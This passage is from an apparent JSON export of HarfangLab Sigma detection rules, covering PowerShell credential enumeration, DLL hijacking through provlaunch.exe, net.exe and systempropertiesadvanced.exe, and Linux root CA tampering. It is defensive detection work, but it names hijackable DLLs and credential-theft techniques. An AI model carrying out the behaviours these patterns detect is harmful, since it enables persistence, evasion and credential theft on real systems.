exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c69bf5ad-bc75-4b74-a48c-2c8840f0068d",
"rule_name": "Unsecured Credentials Enumerated via PowerShell",
"rule_description": "Detects PowerShell script blocks that may be used to look for unsecured credentials on disk.\nAttackers may try to enumerate files on disks or shares that contain credentials for further lateral movement.\nIt is recommended to investigate activity surrounding this event and to hunt for any authentications to possibly affected accounts after this alert.\n",
"rule_creation_date": "2025-12-31",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1552.001",
"attack.t1552.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6ab5a90-c228-4457-bf00-f332a4806ca0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079129Z",
"creation_date": "2026-03-23T11:45:34.079132Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079136Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_provlaunch.yml",
"content": "title: DLL Hijacking via provlaunch.exe\nid: c6ab5a90-c228-4457-bf00-f332a4806ca0\ndescription: |\n Detects potential Windows DLL Hijacking via provlaunch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'provlaunch'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6ab5a90-c228-4457-bf00-f332a4806ca0",
"rule_name": "DLL Hijacking via provlaunch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via provlaunch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6ae380a-a730-47c7-8fba-c5056f4a8cd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590765Z",
"creation_date": "2026-03-23T11:45:34.590769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590776Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_net.yml",
"content": "title: DLL Hijacking via net.exe\nid: c6ae380a-a730-47c7-8fba-c5056f4a8cd7\ndescription: |\n Detects potential Windows DLL Hijacking via net.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'net.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6ae380a-a730-47c7-8fba-c5056f4a8cd7",
"rule_name": "DLL Hijacking via net.exe",
"rule_description": "Detects potential Windows DLL Hijacking via net.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6d53bd7-50c9-4a1a-966d-fecf54bfe22e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097880Z",
"creation_date": "2026-03-23T11:45:34.097882Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097886Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesadvanced.yml",
"content": "title: DLL Hijacking via systempropertiesadvanced.exe\nid: c6d53bd7-50c9-4a1a-966d-fecf54bfe22e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesadvanced.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesadvanced.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\credui.dll'\n - '\\DNSAPI.dll'\n - '\\DSROLE.DLL'\n - '\\LOGONCLI.DLL'\n - '\\netid.dll'\n - '\\NETUTILS.DLL'\n - '\\SRVCLI.DLL'\n - '\\WINBRAND.dll'\n - '\\WINSTA.dll'\n - '\\WKSCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6d53bd7-50c9-4a1a-966d-fecf54bfe22e",
"rule_name": "DLL Hijacking via systempropertiesadvanced.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesadvanced.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6de2835-4ba4-463b-9ed3-eddc36d302c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.500257Z",
"creation_date": "2026-03-23T11:45:35.296996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297000Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md",
"https://attack.mitre.org/techniques/T1553/004/"
],
"name": "t1553_004_root_ca_certificate_tampered_linux.yml",
"content": "title: Root Certificate Authority Tampered\nid: c6de2835-4ba4-463b-9ed3-eddc36d302c6\ndescription: |\n Detects an attempt at tampering the Root CA (Certificate Authority) of the machine.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to ensure a system administrator requested the installation of those root certificates and that they haven't been tampered with.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2023/12/15\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - '/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n selection_misc:\n Kind:\n - 'symlink'\n - 'hardlink'\n Path|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - '/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - '/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n exclusion_common:\n ProcessImage:\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/pacman'\n - '/sbin/apk'\n - '/usr/sbin/apk'\n - '/usr/bin/tar'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/tdnf'\n - '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic'\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dns install'\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_update_ca_certificates:\n - ProcessImage:\n - '/usr/bin/update-ca-certificates'\n - '/usr/sbin/update-ca-certificates'\n - '/usr/bin/update-ca-trust'\n - '/usr/sbin/update-ca-trust'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/update-ca-certificates'\n - '/usr/sbin/update-ca-certificates'\n - '/usr/bin/update-ca-trust'\n - '/usr/sbin/update-ca-trust'\n - ' /bin/update-ca-trust'\n\n exclusion_ca_legacy:\n - ProcessCommandLine|startswith:\n - '/bin/sh /usr/bin/ca-legacy '\n - '/usr/bin/sh /usr/bin/ca-legacy '\n - ProcessParentCommandLine|startswith:\n - '/bin/sh /usr/bin/ca-legacy '\n - '/usr/bin/sh /usr/bin/ca-legacy '\n\n exclusion_snapd:\n ProcessImage:\n - '/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n - ProcessParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessGrandparentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/sbin/dockerd|'\n - '|/usr/local/bin/dockerd|'\n - '|/usr/local/bin/docker-init|'\n - '|/usr/bin/dockerd-current|'\n - '|/usr/sbin/dockerd-current|'\n - '|/usr/bin/containerd|'\n - '|/usr/local/bin/containerd|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd|'\n - '|/var/lib/rancher/rke2/data/*/bin/containerd|'\n - '|/snap/docker/*/bin/dockerd|'\n - '|/snap/microk8s/*/bin/containerd|'\n - '|/usr/bin/dockerd-ce|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_trust:\n ProcessImage: '/usr/bin/trust'\n\n exclusion_eset:\n ProcessImage: '/opt/eset/e??/lib/execd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_netdata:\n ProcessCommandLine: 'tar xpvf -'\n ProcessParentCommandLine|startswith: 'sh /tmp/netdata-updater-'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessParentImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '|/usr/bin/podman|'\n\n exclusion_konea:\n # /opt/quest/kace/bin/konea\n # /data/quest/kace/bin/konea\n ProcessParentImage|endswith: '/quest/kace/bin/konea'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_kace:\n ProcessImage: '/var/quest/kace/modules/clientidentifier/clientidentifier'\n\n exclusion_ubiquity:\n ProcessCommandLine: '/sbin/init maybe-ubiquity'\n\n exclusion_steam_pressure_vessel:\n ProcessImage|endswith: '/steam-runtime-sniper/pressure-vessel/bin/pressure-vessel-wrap'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_earthly:\n Path|endswith: \"/.apk.????????????????????????????????????????????????\"\n ProcessImage: '/usr/bin/qemu-aarch64-static'\n ProcessParentImage: '/usr/bin/earth_debugger'\n ProcessGrandparentImage: '/usr/bin/buildkit-runc'\n ProcessGrandparentCommandLine|contains: ' /tmp/earthly/buildkit/'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_mitel:\n - ProcessParentCommandLine: '/bin/bash /home/scripts_m7450/cert_os.sh'\n - ProcessGrandparentCommandLine: '/bin/sh /etc/init.d/m7450 start'\n\n # template_exclusion_ansible\n\n exclusion_reconfigure:\n ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_katello1:\n ProcessCommandLine: 'cp /etc/rhsm/ca/katello-server-ca.pem /etc/pki/ca-trust/source/anchors'\n ProcessParentCommandLine: '/bin/bash /usr/bin/katello-rhsm-consumer'\n Path: '/etc/pki/ca-trust/source/anchors/katello-server-ca.pem'\n\n exclusion_katello2:\n ProcessImage: '/usr/bin/ln'\n ProcessGrandparentCommandLine: '/bin/bash /usr/bin/katello-rhsm-consumer'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_google_agent:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_salt:\n ProcessParentCommandLine:\n - '/usr/bin/python /usr/bin/salt-master'\n - '/usr/bin/python3 /usr/bin/salt-master'\n - '/usr/libexec/platform-python /usr/bin/salt-master*'\n - '/usr/libexec/platform-python /usr/bin/salt-minion*'\n - '/usr/libexec/platform-python /usr/bin/salt-call*'\n - '/usr/lib/venv-salt-minion/bin/python.original /usr/lib/venv-salt-minion/bin/salt-minion*'\n - '/usr/bin/python3 /var/tmp/.root_??????_salt/salt-call *'\n\n exclusion_zscaler:\n ProcessImage: '/opt/zscaler/bin/zsaservice'\n\n exclusion_coreutils:\n ProcessImage: '/usr/bin/coreutils'\n\n exclusion_forticlient:\n ProcessImage: '/opt/forticlient/webfilter'\n Path|endswith: 'FortiClient_WEBFILTER_CA.crt'\n exclusion_forticlient2:\n ProcessParentImage: '/opt/forticlient/fctsched'\n Path|endswith: 'FortiClient_WEBFILTER_CA.crt'\n\n exclusion_landscape:\n ProcessGrandparentCommandLine:\n - '/usr/bin/python3 /usr/bin/landscape-manager --ignore-sigint'\n - '/usr/bin/python3 /usr/bin/landscape-manager --ignore-sigint --quiet'\n\n exclusion_forge_cli:\n ProcessCommandLine: './forge-cli ca install'\n\n # https://github.com/canonical/landscape-client/blob/main/scripts/landscape-manager\n exclusion_landscape_manager:\n ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python3 /usr/bin/landscape-manager'\n - '/usr/bin/python /usr/bin/landscape-manager'\n\n exclusion_conmon_docker:\n ProcessGrandparentCommandLine|contains|all:\n - '/usr/bin/conmon'\n - '-b /store/docker-data/engine/overlay-containers'\n\n exclusion_cfagent:\n ProcessImage: '/usr/sbin/cfagent'\n\n exclusion_keytool:\n ProcessImage: '/usr/lib/jvm/java-*/jre/bin/keytool'\n\n exclusion_backup:\n ProcessImage:\n - '/bin/cp'\n - '/usr/bin/cp'\n ProcessCurrentDirectory|startswith: '/var/backups/'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path: '/usr/bin/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/usr/bin/sed??????'\n\n exclusion_buildah:\n ProcessImage: '/usr/bin/buildah'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6de2835-4ba4-463b-9ed3-eddc36d302c6",
"rule_name": "Root Certificate Authority Tampered",
"rule_description": "Detects an attempt at tampering the Root CA (Certificate Authority) of the machine.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to ensure a system administrator requested the installation of those root certificates and that they haven't been tampered with.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
